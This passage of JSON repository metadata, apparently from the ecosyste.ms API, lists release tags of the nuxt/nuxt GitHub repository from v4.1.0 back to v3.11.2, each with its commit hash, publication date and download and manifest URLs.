"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1/manifests"},{"name":"v4.1.0","sha":"e12125a97f91a9c9b98191e4b89a2fcc95c318db","kind":"commit","published_at":"2025-09-02T22:12:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0/manifests"},{"name":"v3.19.0","sha":"895650538445a18b588e09c74d9cb640693b63f6","kind":"commit","published_at":"2025-09-02T22:12:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0/manifests"},{"name":"v4.0.3","sha":"c09da8cfa0684bf70a3d657add7feb88ffd7807d","kind":"commit","published_at":"2025-08-05T08:26:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3/manifests"},{"name":"v3.18.1","sha":"dfac5a97d2ec084e194c04f643221118fec9e4c6","kind":"commit","published_at":"2025-08-05T08:26:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1/manifests"},{"name":"v4.0.2","sha":"5d3ef933c3ab2ee9aa3141b3fea7b1549ade7b3a","kind":"commit","published_at":"2025-07-28T23:50:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2/manifests"},{"name":"v3.18.0","sha":"8d9ebfb2a10596211996778fb14b35a20024c319","kind":"commit","published_at":"2025-07-28T23:48:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0/manifests"},{"name":"v4.0.1","sha":"3cfdac3c204c9d64240719f64935484b2b3318f2","kind":"commit","published_at":"2025-07-21T08:55:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"8aacdde48e8388c8bb11b9a5c2f59935341bfcfd","kind":"commit","published_at":"2025-07-15T22:15:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0/manifests"},{"name":"v3.17.7","sha":"b56bc134455391f3ea43d29140162f0b04b615b0","kind":"commit","published_at":"2025-07-13T19:25:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7/manifests"},{"name":"v4.0.0-rc.0","sha":"0344123b3c2c46c6f591c42696eef8ffc6504947","kind":"commit","published_at":"2025-07-07T22:42:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-rc.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0/manifests"},{"name":"v3.17.6","sha":"9867529347c072efb8da5806f6a973cd853d72e1","kind":"commit","published_at":"2025-07-01T16:46:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6/manifests"},{"name":"v4.0.0-alpha.4","sha":"14dd686b8b47beecf024318ae304919cd81ab4ad","kind":"commit","published_at":"2025-06-27T13:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"8b9e1a1ef774dab5a36a94268439079de1a887de","kind":"commit","published_at":"2025-06-26T16:17:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"4b56bb92b9242df959f091e1d2be72cd492f30ca","kind":"commit","published_at":"2025-06-12T09:16:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2/manifests"},{"name":"v3.17.5","sha":"0fa7ff9908c8a573c1efedf216cdf5ec901820af","kind":"commit","published_at":"2025-06-03T21:38:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5/manifests"},{"name":"v4.0.0-alpha.1","sha":"e379ac3e8dd3b37ca26a01d0dc0ffcbc46ece1aa","kind":"commit","published_at":"2025-06-02T19:45:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1/manifests"},{"name":"v3.17.4","sha":"f7437ce28f83723492a1e540a9b43c56c469234a","kind":"commit","published_at":"2025-05-20T19:57:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4/manifests"},{"name":"v3.17.3","sha":"c6dad342e6718377136c675c64d6e20c420dea81","kind":"commit","published_at":"2025-05-12T13:58:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3/manifests"},{"name":"v3.17.2","sha":"346bb2bfe3324b353ec65d4b2f09b46e0a7c5c71","kind":"commit","published_at":"2025-05-05T08:54:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2/manifests"},{"name":"v3.17.1","sha":"de02d2312d79f0bae4eb382a565253b7ddc98f86","kind":"commit","published_at":"2025-04-29T00:20:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1/manifests"},{"name":"v3.17.0","sha":"fa4618c801a3549b56477b8e880f085f527baf84","kind":"commit","published_at":"2025-04-27T22:38:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0/manifests"},{"name":"v3.16.2","sha":"be46b279d12b2ebca676a9db05244ae64c980f78","kind":"commit","published_at":"2025-04-01T10:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2/manifests"},{"name":"v3.16.1","sha":"cd38de24c14e586b61f742e902ad1e3c2ebd2d31","kind":"commit","published_at":"2025-03-19T16:49:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1/manifests"},{"name":"v3.16.0","sha":"7a37a982535f6da0cef16c4d7d3a81df42429ec1","kind":"commit","published_at":"2025-03-07T14:21:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0/manifests"},{"name":"v3.15.4","sha":"244da170dd61e9aa790d5e9fdf988aa0a128d55a","kind":"commit","published_at":"2025-01-29T08:03:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4/manifests"},{"name":"v3.15.3","sha":"048f974eba45e4909dcf53e8ce692fae3c5db37f","kind":"commit","published_at":"2025-01-24T23:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3/manifests"},{"name":"v3.15.2","sha":"87a0ee59aec69c24a83993dcd329ecc9d25c3df3","kind":"commit","published_at":"2025-01-15T15:16:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2/manifests"},{"name":"v3.15.1","sha":"fdf6e879ea00c9e313458e32dc911ca846a525d4","kind":"commit","published_at":"2025-01-05T12:04:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1/manifests"},{"name":"v3.15.0","sha":"1acc9a0a3adabf250b979e58ed634874a9d90ddd","kind":"commit","published_at":"2024-12-24T23:47:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0/manifests"},{"name":"v3.14.1592","sha":"3894e9d7c1fdeed11ea380cc84f7641d90f52a46","kind":"commit","published_at":"2024-11-19T20:52:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.1592","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.1592","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.1592","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592/manifests"},{"name":"v3.14.159","sha":"625689077052ccbea0812defe34e13edb4ca0983","kind":"commit","published_at":"2024-11-06T11:34:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.159","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.159","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.159","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159/manifests"},{"name":"v3.14.0","sha":"42420521c7eaf3480191f990e4fb545954f8f551","kind":"commit","published_at":"2024-11-04T15:46:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0/manifests"},{"name":"v3.13.2","sha":"a50725300f31ca590f0dd4db16db97e3af9a0b18","kind":"commit","published_at":"2024-09-15T21:03:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2/manifests"},{"name":"v3.13.1","sha":"9983e83dae92195e58812e2a106dc9660e0cb559","kind":"commit","published_at":"2024-09-04T09:39:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1/manifests"},{"name":"v3.13.0","sha":"74ef96d096d0045fd00fccd880c1dbbfea51e22a","kind":"commit","published_at":"2024-08-22T16:03:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0/manifests"},{"name":"v3.12.4","sha":"4a1349f700aa6af14253de7363acf243ecad2c02","kind":"commit","published_at":"2024-07-18T22:30:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4/manifests"},{"name":"v3.12.3","sha":"a9fcd82d8eeaf750205838a4e96e9478f18a154f","kind":"commit","published_at":"2024-07-02T15:05:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3/manifests"},{"name":"v2.18.1","sha":"81f5335f26b4f593004a503f2ec7d9a6fd723b64","kind":"tag","published_at":"2024-06-28T11:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1/manifests"},{"name":"v2.18.0","sha":"9f5fc19018ae2d6c9afe2ece12d86cba7bbed8f8","kind":"tag","published_at":"2024-06-27T15:41:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0/manifests"},{"name":"v3.12.2","sha":"8578e2bd62bdf3ce9dab70c7241a3953feb043b7","kind":"commit","published_at":"2024-06-16T07:36:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2/manifests"},{"name":"v2.17.4","sha":"5b437353d0ae6972e7a35a47feb8062949daf625","kind":"tag","published_at":"2024-06-14T13:46:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4/manifests"},{"name":"v3.12.1","sha":"41fc45da254408921972ab626101c41cea70de32","kind":"commit","published_at":"2024-06-11T10:50:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1/manifests"},{"name":"v3.12.0","sha":"9f06842fa1b323bd0e0911b0335a091a9052b5c3","kind":"commit","published_at":"2024-06-11T08:44:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0/manifests"},{"name":"@nuxt/ui-templates@1.3.3","sha":"a16107b93bad4fd5a25d48598967e11b59b7baf3","kind":"tag","published_at":"2024-04-05T12:43:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3/manifests"},{"name":"v3.11.2","sha":"3c90aaf8e21955cf0644df2e0b09e3e33441e8e2","kind":"commit","published_at":"2024-04-04T16:04:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2/manifests"},{"name":"@nuxt/ui-templates@1.3.2","sha":"61297118022700364431a7